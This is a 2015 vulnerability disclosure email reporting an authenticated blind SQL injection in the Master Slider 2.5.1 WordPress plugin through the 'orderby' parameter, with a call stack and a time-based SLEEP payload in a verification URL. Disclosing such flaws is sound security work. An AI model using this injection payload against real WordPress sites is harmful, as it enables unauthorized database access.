Subject: Blind SQL injection in Master Slider 2.5.1
Date: Thu, 20 Aug 2015 11:25:22 +0200

Hello,

Plugin: Master Slider 2.5.1 https://wordpress.org/plugins/master-slider/

1. Blind SQL injection (MSP_DB::ms_query)

Authenticated users (like editors) can execute arbitrary sql commands (there is no CSRF protection)

Method: http://localhost/wp-admin/admin.php?page=master-slider&orderby=[sqli]
Url: GET
Vulnerable parameters: orderby

Example PHP callstack:
/master-slider/admin/views/slider-dashboard/list-sliders.php:6
MSP_List_Table::prepare_items   [/master-slider/admin/includes/classes/class-msp-list-table.php:186]
MSP_List_Table::get_total_count   [/master-slider/admin/includes/classes/class-msp-list-table.php:166]
MSP_List_Table::get_records   [/master-slider/admin/includes/classes/class-msp-list-table.php:159]
MSP_DB::get_sliders   [/master-slider/includes/classes/class-msp-db.php:552]
MSP_DB::get_sliders_list   [/master-slider/includes/classes/class-msp-db.php:534]
MSP_DB::ms_query   [/master-slider/includes/classes/class-msp-db.php:509]
wpdb::get_results

Verification:
http://localhost/wp-admin/admin.php?page=master-slider&orderby=(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)--%20-

--
Regards,
Marcin Probola,